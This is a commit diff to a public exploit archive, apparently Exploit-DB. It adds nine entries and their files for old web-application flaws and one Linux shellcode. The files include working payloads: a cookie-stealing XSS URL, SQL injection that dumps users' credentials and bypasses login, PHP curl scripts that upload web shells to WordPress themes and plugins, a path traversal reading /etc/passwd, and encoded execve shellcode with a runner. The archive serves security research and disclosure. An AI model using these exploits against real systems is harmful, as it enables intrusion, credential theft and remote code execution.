DB: 2015-06-30
9 new exploits
This commit is contained in:
parent
422d274587
commit
7c733046b7
10 changed files with 248 additions and 0 deletions
|
@ -33762,3 +33762,12 @@ id,file,description,date,author,platform,type,port
|
||||||
37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component 'flash_upload.php' Arbitrary File Upload Vulnerability",2012-06-17,"Sammy FORGIT",php,webapps,0
|
37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component 'flash_upload.php' Arbitrary File Upload Vulnerability",2012-06-17,"Sammy FORGIT",php,webapps,0
|
||||||
37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0
|
37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0
|
||||||
37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload Vulnerability",2012-06-16,"Sammy FORGIT",php,webapps,0
|
37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload Vulnerability",2012-06-16,"Sammy FORGIT",php,webapps,0
|
||||||
|
37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection Vulnerability",2012-06-15,"Taurus Omar",php,webapps,0
|
||||||
|
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0
|
||||||
|
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0
|
||||||
|
37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
|
||||||
|
37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||||
|
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||||
|
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||||
|
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
|
||||||
|
37427,platforms/linux/shellcode/37427.txt,"encoded 64 bit execve shellcode",2015-06-29,"Bill Borskey",linux,shellcode,0
|
||||||
|
|
Can't render this file because it is too large.
|
9
platforms/java/webapps/37416.txt
Executable file
9
platforms/java/webapps/37416.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54049/info
|
||||||
|
|
||||||
|
Squiz CMS is prone to multiple cross-site scripting vulnerabilities and an XML external entity injection vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
Attackers may exploit these issues to execute arbitrary code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to perform XML based attacks (including local file disclosure), TCP port scans, and a denial of service (DoS) condition; other attacks are also possible.
|
||||||
|
|
||||||
|
Squiz CMS 4.6.3 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/_admin/?SQ_BACKEND_PAGE=main&backend_section=am&am_section=edit_asset"><script>alert(document.cookie)</script>&assetid=73&sq_asset_path=%2C1%2C73&sq_link_path=%2C0%2C74&asset_ei_screen=details [XSS]
|
40
platforms/linux/shellcode/37427.txt
Executable file
40
platforms/linux/shellcode/37427.txt
Executable file
|
@ -0,0 +1,40 @@
|
||||||
|
/*
|
||||||
|
Compile with: gcc -fno-stack-protector -z execstack
|
||||||
|
This execve shellcode is encoded with 0xff and is for 64 bit linux.
|
||||||
|
|
||||||
|
shell: file format elf64-x86-64
|
||||||
|
|
||||||
|
|
||||||
|
Disassembly of section .text:
|
||||||
|
|
||||||
|
0000000000400080 <start>:
|
||||||
|
400080:=0948 b9 ff ff ff ff ff =09movabs rcx,0xffffffffffffffff
|
||||||
|
400087:=09ff ff ff=20
|
||||||
|
40008a:=0949 b8 ae b7 72 c3 db =09movabs r8,0xfffaf0dbc372b7ae
|
||||||
|
400091:=09f0 fa ff=20
|
||||||
|
400094:=0949 31 c8 =09xor r8,rcx
|
||||||
|
400097:=0941 50 =09push r8
|
||||||
|
400099:=0949 b8 d0 9d 96 91 d0 =09movabs r8,0x978cd0d091969dd0
|
||||||
|
4000a0:=09d0 8c 97=20
|
||||||
|
4000a3:=0949 31 c8 =09xor r8,rcx
|
||||||
|
4000a6:=0941 50 =09push r8
|
||||||
|
4000a8:=0949 b8 b7 ce 2d ad 4f =09movabs r8,0x46b7c44fad2dceb7
|
||||||
|
4000af:=09c4 b7 46=20
|
||||||
|
4000b2:=0949 31 c8 =09xor r8,rcx
|
||||||
|
4000b5:=0941 50 =09push r8
|
||||||
|
4000b7:=09ff e4 =09jmp rsp
|
||||||
|
|
||||||
|
2015 William Borskey
|
||||||
|
|
||||||
|
*/
|
||||||
|
char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";
|
||||||
|
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
int (*func)();
|
||||||
|
func = (int (*)()) shellcode;
|
||||||
|
(int)(*func)();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
7
platforms/php/webapps/37413.txt
Executable file
7
platforms/php/webapps/37413.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54042/info
|
||||||
|
|
||||||
|
The JCal Pro Calendar component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
http://www.example.com/index.php?option=com_jcalpro&Itemid=1 [SQL Injection]
|
73
platforms/php/webapps/37414.txt
Executable file
73
platforms/php/webapps/37414.txt
Executable file
|
@ -0,0 +1,73 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54043/info
|
||||||
|
|
||||||
|
Simple Document Management System is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||||
|
|
||||||
|
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
Simple Document Management System versions 1.1.5 and 2.0 are vulnerable.
|
||||||
|
|
||||||
|
-----------
|
||||||
|
version 2.0
|
||||||
|
-----------
|
||||||
|
|
||||||
|
/list.php?folder_id=['foo]
|
||||||
|
/detail.php?doc_id=['foo]
|
||||||
|
|
||||||
|
<code>
|
||||||
|
line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id'];
|
||||||
|
...
|
||||||
|
line 48: if(isset($order)) {
|
||||||
|
$query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order);
|
||||||
|
} else {
|
||||||
|
$query = "SELECT id,name FROM folders WHERE parent=$folder_id";
|
||||||
|
}
|
||||||
|
</code>
|
||||||
|
|
||||||
|
.xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users--
|
||||||
|
|
||||||
|
|
||||||
|
~~ [Blind]
|
||||||
|
|
||||||
|
/user_photo.php?view=[foo]
|
||||||
|
|
||||||
|
<code>
|
||||||
|
$query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view'];
|
||||||
|
$res = mysql_query($query, $sql);
|
||||||
|
if( mysql_num_rows($res) == 1 ) {
|
||||||
|
$row = mysql_fetch_array($res);
|
||||||
|
header( "Content-type: $row[mime]" );
|
||||||
|
echo "". base64_decode($row[photo]) ."";
|
||||||
|
} else {
|
||||||
|
echo "Badness!\n";
|
||||||
|
}
|
||||||
|
</code>
|
||||||
|
|
||||||
|
.poc! :: /user_photo.php?view=2+and+1=1
|
||||||
|
/user_photo.php?view=2+and+1=2
|
||||||
|
|
||||||
|
|
||||||
|
-------------
|
||||||
|
version 1.1.5
|
||||||
|
-------------
|
||||||
|
|
||||||
|
/login.php
|
||||||
|
|
||||||
|
<code>
|
||||||
|
$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");
|
||||||
|
$row = @mysql_fetch_array($result);
|
||||||
|
if( $row[0] != 0 ) {
|
||||||
|
header("Location: index.php");
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
|
||||||
|
$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");
|
||||||
|
$row = @mysql_fetch_array($result);
|
||||||
|
$id = $row[id];
|
||||||
|
$name = $row[name];
|
||||||
|
</code>
|
||||||
|
|
||||||
|
.xpl! :: user: Admin
|
||||||
|
password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users --
|
||||||
|
|
||||||
|
|
||||||
|
__h0__
|
30
platforms/php/webapps/37415.txt
Executable file
30
platforms/php/webapps/37415.txt
Executable file
|
@ -0,0 +1,30 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54045/info
|
||||||
|
|
||||||
|
Multiple Webify products are prone to multiple HTML-injection and local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the web server process. Other attacks are also possible.
|
||||||
|
|
||||||
|
The following Webify products are vulnerable:
|
||||||
|
|
||||||
|
Webify eDownloads Cart
|
||||||
|
Webify eDownloads
|
||||||
|
Webify Project Manager
|
||||||
|
Webify Blog
|
||||||
|
|
||||||
|
Local file include:
|
||||||
|
|
||||||
|
http://www.example.com/index.php?page=[LOCAL FILE INCLUDE]
|
||||||
|
|
||||||
|
http://www.example.com/admin/index.php?page=[LOCAL FILE INCLUDE]
|
||||||
|
|
||||||
|
HTML injection:
|
||||||
|
|
||||||
|
http://www.example.com/admin/index.php?page=query [Persistent Script Code Inject via Query Value]
|
||||||
|
|
||||||
|
http://www.example.com/admin/index.php?page=addobjects [Persistent Script Code Inject via addObject name Value]
|
||||||
|
|
||||||
|
http://www.example.com/admin/index.php?page=formdesigner [Persistent Script Code Inject via former label Value]
|
||||||
|
|
||||||
|
http://www.example.com/admin/index.php?page=comments [Persistent Script Code Inject via Comment text & name Value]
|
||||||
|
|
||||||
|
http://www.example.com/admin/index.php?page=submissions [Persistent Script Code Inject via submission name Value]
|
35
platforms/php/webapps/37417.php
Executable file
35
platforms/php/webapps/37417.php
Executable file
|
@ -0,0 +1,35 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54052/info
|
||||||
|
|
||||||
|
Multiple Themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||||
|
|
||||||
|
WordPress Famous theme 2.0.5 and WordPress Deep Blue theme 1.9.2 are vulnerable.
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
$uploadfile="lo.php";
|
||||||
|
|
||||||
|
$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/deep-blue/megaframe/megapanel/inc/&fileext=php");
|
||||||
|
curl_setopt($ch, CURLOPT_POST, true);
|
||||||
|
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
|
||||||
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||||
|
$postResult = curl_exec($ch);
|
||||||
|
curl_close($ch);
|
||||||
|
print "$postResult";
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
$uploadfile="lo.php";
|
||||||
|
|
||||||
|
$ch = curl_init("http://www.example.com/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/&;fileext=php");
|
||||||
|
curl_setopt($ch, CURLOPT_POST, true);
|
||||||
|
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
|
||||||
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||||
|
$postResult = curl_exec($ch);
|
||||||
|
curl_close($ch);
|
||||||
|
print "$postResult";
|
||||||
|
|
||||||
|
?>
|
29
platforms/php/webapps/37418.php
Executable file
29
platforms/php/webapps/37418.php
Executable file
|
@ -0,0 +1,29 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54057/info
|
||||||
|
|
||||||
|
LB Mixed Slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||||
|
|
||||||
|
LB Mixed Slideshow 1.0 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
PostShell.php
|
||||||
|
<?php
|
||||||
|
|
||||||
|
$uploadfile="lo.php.gif";
|
||||||
|
|
||||||
|
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php?element_name=images&gid=1");
|
||||||
|
curl_setopt($ch, CURLOPT_POST, true);
|
||||||
|
curl_setopt($ch, CURLOPT_POSTFIELDS, array('images'=>"@$uploadfile"));
|
||||||
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||||
|
$postResult = curl_exec($ch);
|
||||||
|
curl_close($ch);
|
||||||
|
print "$postResult";
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
Shell Access : http://www.example.com/wordpress/wp-content/plugins/lb-mixed-slideshow/gallery/1/lo.php.gif
|
||||||
|
|
||||||
|
lo.php.gif
|
||||||
|
<?php
|
||||||
|
phpinfo();
|
||||||
|
?>
|
9
platforms/php/webapps/37419.txt
Executable file
9
platforms/php/webapps/37419.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54058/info
|
||||||
|
|
||||||
|
Wp-ImageZoom for WordPress is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
|
||||||
|
|
||||||
|
Wp-ImageZoom 1.0.3 is vulnerable; other versions may also be affected.
|
||||||
|
|
||||||
|
http://www.example.com/wordpress/wp-content/plugins/wp-imagezoom/download.php?file=../../../../../../../etc/passwd
|
7
platforms/php/webapps/37420.txt
Executable file
7
platforms/php/webapps/37420.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/54066/info
|
||||||
|
|
||||||
|
VANA CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
http://www.example.com/general/index.php?recordID=125'
|
Loading…
Add table
Reference in a new issue